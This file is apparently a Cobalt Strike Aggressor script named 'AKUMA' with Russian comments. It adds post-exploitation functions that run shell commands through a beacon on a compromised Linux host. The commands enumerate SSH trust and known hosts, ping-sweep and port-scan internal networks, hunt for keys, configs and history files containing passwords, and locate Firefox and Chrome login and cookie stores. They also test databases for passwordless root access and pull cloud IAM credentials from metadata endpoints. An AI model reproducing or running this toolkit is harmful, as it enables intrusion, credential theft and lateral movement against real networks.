# AKUMA's Linux Extended Functions
# Дополнительные функции для lateral movement и data collection

# ========== LATERAL MOVEMENT FUNCTIONS ==========

sub akuma_trust_enum {
    local('$bid');
    $bid = $1;
    
    blog($bid, "🔍 AKUMA Trust Relationship Enumeration Starting...");
    
    bshell($bid, "echo '=== AKUMA TRUST RELATIONSHIP ANALYSIS ==='");
    
    bshell($bid, "echo '=== SSH CONNECTIONS ==='");
    bshell($bid, "ss -anp 2>/dev/null | grep :22 | grep ESTABLISHED");
    bshell($bid, "netstat -anp 2>/dev/null | grep :22 | grep ESTABLISHED");
    
    bshell($bid, "echo '=== KNOWN HOSTS ==='");
    bshell($bid, "cat ~/.ssh/known_hosts 2>/dev/null | awk '{print $1}' | sort -u");
    bshell($bid, "find /home -name 'known_hosts' 2>/dev/null | xargs cat 2>/dev/null | awk '{print $1}' | sort -u");
    
    bshell($bid, "echo '=== RECENT CONNECTIONS ==='");
    bshell($bid, "last -i | head -20");
    bshell($bid, "lastlog 2>/dev/null | head -10");
    
    bshell($bid, "echo '=== SSH CONFIG ==='");
    bshell($bid, "cat ~/.ssh/config 2>/dev/null");
    bshell($bid, "find /home -name 'config' -path '*/.ssh/*' 2>/dev/null | xargs cat 2>/dev/null");
    
    bshell($bid, "echo '=== SUDO USAGE ==='");
    bshell($bid, "grep -r 'sudo' ~/.bash_history 2>/dev/null | tail -10");
    bshell($bid, "grep -r 'su ' ~/.bash_history 2>/dev/null | tail -10");
    
    blog($bid, "✅ AKUMA Trust Enumeration Complete!");
}

sub akuma_internal_scan {
    local('$bid');
    $bid = $1;
    
    blog($bid, "🌐 AKUMA Internal Network Scan Starting...");
    
    bshell($bid, "echo '=== AKUMA INTERNAL NETWORK SCANNER ==='");
    
    # Получаем сетевые интерфейсы и маршруты
    bshell($bid, "echo '=== NETWORK ROUTES ==='");
    bshell($bid, "ip route | grep -E '^[0-9]' | awk '{print $1}' | grep '/'");
    
    # Ping sweep для основных сетей
    bshell($bid, "echo '=== PING SWEEP ==='");
    bshell($bid, "for network in 192.168.1 192.168.0 10.0.0 172.16.0; do echo \"Scanning $network.0/24:\"; for i in {1..20}; do ping -c 1 -W 1 $network.$i >/dev/null 2>&1 && echo \"  $network.$i alive\" &; done; wait; done");
    
    # Port scanning для найденных хостов
    bshell($bid, "echo '=== PORT SCANNING COMMON HOSTS ==='");
    bshell($bid, "for host in 192.168.1.1 192.168.1.10 192.168.1.100 10.0.0.1 10.0.0.10; do echo \"Scanning $host:\"; for port in 21 22 23 25 53 80 135 139 443 445 993 995 1433 3389 5432 8080; do timeout 1 bash -c \"</dev/tcp/$host/$port\" 2>/dev/null && echo \"  $port/tcp open\"; done; done");
    
    blog($bid, "✅ AKUMA Internal Scan Complete!");
}

sub akuma_share_discovery {
    local('$bid');
    $bid = $1;
    
    blog($bid, "📋 AKUMA Share Discovery Starting...");
    
    bshell($bid, "echo '=== AKUMA NETWORK SHARES DISCOVERY ==='");
    
    bshell($bid, "echo '=== NFS SHARES ==='");
    bshell($bid, "showmount -e 2>/dev/null");
    bshell($bid, "showmount -e localhost 2>/dev/null");
    bshell($bid, "cat /etc/exports 2>/dev/null");
    bshell($bid, "mount | grep nfs");
    
    bshell($bid, "echo '=== SMB/CIFS SHARES ==='");
    bshell($bid, "smbclient -L //localhost -N 2>/dev/null");
    bshell($bid, "smbclient -L //127.0.0.1 -N 2>/dev/null");
    bshell($bid, "mount | grep cifs");
    bshell($bid, "cat /etc/samba/smb.conf 2>/dev/null | grep -v '^#' | grep -v '^$'");
    
    bshell($bid, "echo '=== CURRENT MOUNTS ==='");
    bshell($bid, "mount | grep -E 'nfs|cifs|sshfs|ftp'");
    bshell($bid, "cat /etc/fstab | grep -E 'nfs|cifs|sshfs|ftp'");
    
    bshell($bid, "echo '=== NETWORK FILESYSTEM SERVICES ==='");
    bshell($bid, "ps aux | grep -E 'nfsd|smbd|nmbd|rpcbind' | grep -v grep");
    
    blog($bid, "✅ AKUMA Share Discovery Complete!");
}

# ========== DATA COLLECTION FUNCTIONS ==========

sub akuma_file_hunt {
    local('$bid');
    $bid = $1;
    
    blog($bid, "🗂️ AKUMA Sensitive File Hunt Starting...");
    
    bshell($bid, "echo '=== AKUMA SENSITIVE FILE HUNTER ==='");
    
    # Документы
    bshell($bid, "echo '=== DOCUMENTS ==='");
    bshell($bid, "find /home -type f \\( -name '*.pdf' -o -name '*.doc' -o -name '*.docx' -o -name '*.xls' -o -name '*.xlsx' -o -name '*.ppt' -o -name '*.pptx' \\) 2>/dev/null | head -30");
    
    # Текстовые файлы
    bshell($bid, "echo '=== TEXT FILES ==='");
    bshell($bid, "find /home -type f \\( -name '*.txt' -o -name '*.rtf' -o -name '*.odt' \\) 2>/dev/null | head -20");
    
    # Архивы
    bshell($bid, "echo '=== ARCHIVES ==='");
    bshell($bid, "find /home -type f \\( -name '*.zip' -o -name '*.rar' -o -name '*.tar' -o -name '*.gz' -o -name '*.7z' \\) 2>/dev/null | head -20");
    
    # Базы данных
    bshell($bid, "echo '=== DATABASE FILES ==='");
    bshell($bid, "find /home -type f \\( -name '*.sql' -o -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' -o -name '*.mdb' \\) 2>/dev/null | head -15");
    
    # Конфиги с возможными паролями
    bshell($bid, "echo '=== CONFIG FILES ==='");
    bshell($bid, "find /home -type f \\( -name '*.conf' -o -name '*.config' -o -name '*.ini' -o -name '*.properties' \\) 2>/dev/null | head -20");
    
    # SSH и криптографические ключи
    bshell($bid, "echo '=== KEYS AND CERTIFICATES ==='");
    bshell($bid, "find /home -type f \\( -name 'id_*' -o -name '*.pem' -o -name '*.key' -o -name '*.crt' -o -name '*.p12' -o -name '*.pfx' \\) 2>/dev/null | head -20");
    
    # История команд с возможными паролями
    bshell($bid, "echo '=== COMMAND HISTORY SECRETS ==='");
    bshell($bid, "find /home -name '.*_history' 2>/dev/null | xargs grep -l -i 'pass\\|secret\\|key' 2>/dev/null | head -5");
    
    # Скрипты с возможными учетными данными
    bshell($bid, "echo '=== SCRIPTS ==='");
    bshell($bid, "find /home -type f \\( -name '*.sh' -o -name '*.py' -o -name '*.pl' -o -name '*.rb' \\) 2>/dev/null | xargs grep -l -i 'password\\|secret\\|key' 2>/dev/null | head -10");
    
    blog($bid, "✅ AKUMA File Hunt Complete!");
}

sub akuma_browser_extract {
    local('$bid');
    $bid = $1;
    
    blog($bid, "🌐 AKUMA Browser Data Extract Starting...");
    
    bshell($bid, "echo '=== AKUMA BROWSER DATA EXTRACTION ==='");
    
    # Firefox профили
    bshell($bid, "echo '=== FIREFOX PROFILES ==='");
    bshell($bid, "find /home -path '*/.mozilla/firefox/*/places.sqlite' 2>/dev/null");
    bshell($bid, "find /home -path '*/.mozilla/firefox/*/key4.db' 2>/dev/null");
    bshell($bid, "find /home -path '*/.mozilla/firefox/*/logins.json' 2>/dev/null");
    bshell($bid, "find /home -path '*/.mozilla/firefox/*/cookies.sqlite' 2>/dev/null");
    bshell($bid, "find /home -path '*/.mozilla/firefox/*/formhistory.sqlite' 2>/dev/null");
    
    # Chrome/Chromium профили
    bshell($bid, "echo '=== CHROME/CHROMIUM PROFILES ==='");
    bshell($bid, "find /home -path '*/.config/google-chrome/*/Login Data' 2>/dev/null");
    bshell($bid, "find /home -path '*/.config/chromium/*/Login Data' 2>/dev/null");
    bshell($bid, "find /home -path '*/.config/google-chrome/*/History' 2>/dev/null");
    bshell($bid, "find /home -path '*/.config/chromium/*/History' 2>/dev/null");
    bshell($bid, "find /home -path '*/.config/google-chrome/*/Cookies' 2>/dev/null");
    bshell($bid, "find /home -path '*/.config/chromium/*/Cookies' 2>/dev/null");
    
    # Opera
    bshell($bid, "echo '=== OPERA ==='");
    bshell($bid, "find /home -path '*/.config/opera/*/Login Data' 2>/dev/null");
    bshell($bid, "find /home -path '*/.config/opera/*/History' 2>/dev/null");
    
    # Дополнительная информация о браузерах
    bshell($bid, "echo '=== BROWSER PROCESSES ==='");
    bshell($bid, "ps aux | grep -E 'firefox|chrome|chromium|opera' | grep -v grep");
    
    # Список расширений
    bshell($bid, "echo '=== BROWSER EXTENSIONS ==='");
    bshell($bid, "find /home -path '*/.config/google-chrome/*/Extensions' -type d 2>/dev/null | head -5");
    bshell($bid, "find /home -path '*/.mozilla/firefox/*/extensions' -type d 2>/dev/null | head -5");
    
    blog($bid, "✅ AKUMA Browser Extract Complete!");
}

sub akuma_database_discovery {
    local('$bid');
    $bid = $1;
    
    blog($bid, "💽 AKUMA Database Discovery Starting...");
    
    bshell($bid, "echo '=== AKUMA DATABASE DISCOVERY ==='");
    
    # Поиск файлов баз данных
    bshell($bid, "echo '=== DATABASE FILES ==='");
    bshell($bid, "find / -type f \\( -name '*.sql' -o -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' -o -name '*.mdb' -o -name '*.accdb' \\) 2>/dev/null | head -30");
    
    # Поиск процессов СУБД
    bshell($bid, "echo '=== DATABASE PROCESSES ==='");
    bshell($bid, "ps aux | grep -E 'mysql|postgres|mongo|redis|oracle|mariadb|cassandra|couchdb' | grep -v grep");
    
    # Проверка портов СУБД
    bshell($bid, "echo '=== DATABASE PORTS ==='");
    bshell($bid, "ss -tlnp | grep -E ':3306|:5432|:27017|:6379|:1521|:1433|:7000|:5984'");
    
    # Конфигурационные файлы СУБД
    bshell($bid, "echo '=== DATABASE CONFIGS ==='");
    bshell($bid, "find /etc -name '*mysql*' -o -name '*postgres*' -o -name '*mongo*' -o -name '*redis*' 2>/dev/null | head -15");
    bshell($bid, "find /home -name '*.cnf' -o -name 'pg_hba.conf' -o -name 'mongod.conf' -o -name 'redis.conf' 2>/dev/null | head -10");
    
    # Логи СУБД
    bshell($bid, "echo '=== DATABASE LOGS ==='");
    bshell($bid, "find /var/log -name '*mysql*' -o -name '*postgres*' -o -name '*mongo*' -o -name '*redis*' 2>/dev/null | head -10");
    
    # Директории данных СУБД
    bshell($bid, "echo '=== DATABASE DATA DIRECTORIES ==='");
    bshell($bid, "ls -la /var/lib/mysql/ 2>/dev/null | head -10");
    bshell($bid, "ls -la /var/lib/postgresql/ 2>/dev/null | head -10");
    bshell($bid, "ls -la /var/lib/mongodb/ 2>/dev/null | head -10");
    bshell($bid, "ls -la /var/lib/redis/ 2>/dev/null | head -10");
    
    # Проверка доступности локальных соединений
    bshell($bid, "echo '=== DATABASE CONNECTIVITY CHECK ==='");
    bshell($bid, "timeout 2 mysql -u root -e 'SHOW DATABASES;' 2>/dev/null && echo 'MySQL root access available' || echo 'MySQL root access denied'");
    bshell($bid, "timeout 2 psql -U postgres -c '\\l' 2>/dev/null && echo 'PostgreSQL postgres access available' || echo 'PostgreSQL postgres access denied'");
    bshell($bid, "timeout 2 mongo --eval 'db.adminCommand(\"listDatabases\")' 2>/dev/null && echo 'MongoDB access available' || echo 'MongoDB access denied'");
    
    blog($bid, "✅ AKUMA Database Discovery Complete!");
}

# ========== ADVANCED ENUMERATION ==========

sub akuma_container_enum {
    local('$bid');
    $bid = $1;
    
    blog($bid, "🐳 AKUMA Container Enumeration Starting...");
    
    bshell($bid, "echo '=== CONTAINER ENUMERATION ==='");
    
    # Docker
    bshell($bid, "echo '=== DOCKER ==='");
    bshell($bid, "docker ps 2>/dev/null | head -20");
    bshell($bid, "docker images 2>/dev/null | head -20");
    bshell($bid, "ls -la /var/run/docker.sock 2>/dev/null");
    bshell($bid, "cat /.dockerenv 2>/dev/null && echo 'Running inside Docker container'");
    
    # Kubernetes/OpenShift
    bshell($bid, "echo '=== KUBERNETES ==='");
    bshell($bid, "kubectl get pods 2>/dev/null | head -20");
    bshell($bid, "ls -la /var/run/secrets/kubernetes.io/ 2>/dev/null");
    bshell($bid, "cat /proc/1/cgroup | grep -i kube && echo 'Running in Kubernetes'");
    
    # LXC/LXD
    bshell($bid, "echo '=== LXC/LXD ==='");
    bshell($bid, "lxc list 2>/dev/null");
    bshell($bid, "cat /proc/1/environ | grep -q container=lxc && echo 'Running in LXC'");
    
    blog($bid, "✅ AKUMA Container Enumeration Complete!");
}

sub akuma_cloud_enum {
    local('$bid');
    $bid = $1;
    
    blog($bid, "☁️ AKUMA Cloud Environment Enumeration Starting...");
    
    bshell($bid, "echo '=== CLOUD ENVIRONMENT ENUMERATION ==='");
    
    # AWS
    bshell($bid, "echo '=== AWS METADATA ==='");
    bshell($bid, "timeout 3 curl -s http://169.254.169.254/latest/meta-data/instance-id 2>/dev/null && echo 'AWS instance detected'");
    bshell($bid, "timeout 3 curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null");
    
    # Google Cloud
    bshell($bid, "echo '=== GCP METADATA ==='");
    bshell($bid, "timeout 3 curl -s -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/instance/name 2>/dev/null && echo 'GCP instance detected'");
    
    # Azure
    bshell($bid, "echo '=== AZURE METADATA ==='");
    bshell($bid, "timeout 3 curl -s -H 'Metadata: true' http://169.254.169.254/metadata/instance/compute/vmId?api-version=2021-02-01 2>/dev/null && echo 'Azure instance detected'");
    
    # Cloud init
    bshell($bid, "echo '=== CLOUD-INIT ==='");
    bshell($bid, "ls -la /var/lib/cloud/ 2>/dev/null");
    bshell($bid, "cat /var/log/cloud-init.log 2>/dev/null | head -10");
    
    blog($bid, "✅ AKUMA Cloud Enumeration Complete!");
}

blog("🔥 AKUMA Linux Extended Functions Loaded!");
